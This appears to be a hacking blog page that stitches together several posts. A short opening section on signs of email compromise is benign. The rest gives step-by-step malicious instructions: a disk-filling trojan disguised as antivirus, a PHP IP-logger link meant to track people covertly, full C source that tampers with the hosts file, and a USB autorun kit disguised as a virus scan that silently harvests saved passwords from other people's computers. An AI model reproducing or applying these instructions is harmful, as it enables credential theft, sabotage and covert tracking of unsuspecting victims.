Web Globe

Do you suspect that your email account is under attack? Do you want to maintain total security of your email account and make it 100% hack proof? Well, Some times our email account might have got hacked and we may not be aware of that. We may believe that our email account is safe, but in reality our private and confidential information may be falling into the hands of a third person.

Here are some signs of unauthorized activity on an email account.

1. Your new emails are marked as Read even if you’ve not read them.

2. Your emails are moved to Trash or even permanently deleted without your notice.

3. Your emails are being forwarded to a third party email address (check your settings->forwarding).

4. Your secondary email address is changed.

If you come across any of the above activities on your email account, then it is a clear indication that your email account is hacked.

Additional Security Features in Gmail to ensure the Safety of your Account

Gmail provides an additional security feature to protect your email account through the means of IP address logging. That is, Gmail records your IP address every time you login to your Gmail account. So, if a third party gets access to your account then even his/her IP is also recorded. To see a list of recorded IP address, scroll down to the bottom of your Gmail account and you’ll see something like this.

You can see from the above figure that Gmail shows the IP address of last login (last account activity). You can click on Details to see the IP address of your last 5 activities. If you find that the IP listed in the logs doesn’t belong to you, then you can suspect unauthorized activity.

Steps to be carried out to stop unauthorized activity on your email account

If you feel/suspect that your account is hacked then you must immediately take the actions mentioned below

1. Change your Password

2. Change your security question.

2. Remove any third party email address (if any) to which your account is set to forward emails.

3. Make sure that you can access the email account of your secondary email address.

4. Also change you secondary email password and security question.

This ensures that your account is safe from future attacks. But I strongly recommend that you read the following post to protect your email account from being hacked.

Klik HERE to Download

Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The Trojan is available for download along with the source code at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.

Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.

The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll”

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

You can download the Trojan along with it’s source code HERE.
How to compile, test and remove the damage?

Compilation:

You can use Borland C++ compiler (or equivalent) to compile the Trojan.

Testing:

To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

How to remove the Damage and free up the space?

To remove the damage and free up the space, just type the following in the “run” dialog box.

%systemroot%system32

Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

I have created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

1. Download the IP Finder script (IP_Finder.ZIP) that I have created.

2. Open a new account in X10Hosting (or any free host that supports PHP).

3. Extract the IP_Finder.ZIP file and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.

4. You can rename the ip.php to any name of your choice.

5. Set the permission to 777 on ip_log.txt.

Now you are all set to find the IP address of your friend or any remote computer of your choice. All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.

For your better understanding let’s take up the following example.

Suppose you open a new account in X10hosting.com with the subdomain as abc, then your IP Finder link would be

http://abc.x10hosting.com/ip.php

You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.

To find the recorded IP address check the logs using the following link.

http://abc.x10hosting.com/ip_log.php

The sample log will be in the following format

79.92.144.237 Thursday 07th of May 2009 05:31:27 PM
59.45.144.237 Thursday 07th of May 2009 05:31:28 PM
123.92.144.237 Thursday 07th of May 2009 05:31:31 PM

note: abc is a subdomain name, you can change it

Here is the sourcecode of the virus.

#include
#include
#include

char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1?;
FILE *target;

int find_root(void);
void block_site(void);

int find_root()
{
int done;
struct ffblk ffblk;//File block structure

done=findfirst(”C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

done=findfirst(”F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(”F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}

else return 0;
}

void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/

fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}

void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

1. Compile the sourcecode using any C/C++ compiler.

2. To test, run the compiled module. It will block the sites that is listed in the source code.

3. Once you run the file block_Site.exe , restart your browser program.Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

4. To remove the virus type the following the Run.
%windir%\system32\drivers\etc

5. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1—————————google.com

6. Delete all such entries which contain the names of blocked sites.

Download this first :

http://dhani-web.com/download/iepv.zip

http://dhani-web.com/download/mailpv.zip

http://dhani-web.com/download/mspass.zip

http://dhani-web.com/download/passwordfox.zip

http://dhani-web.com/download/pspv.zip

Step:

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista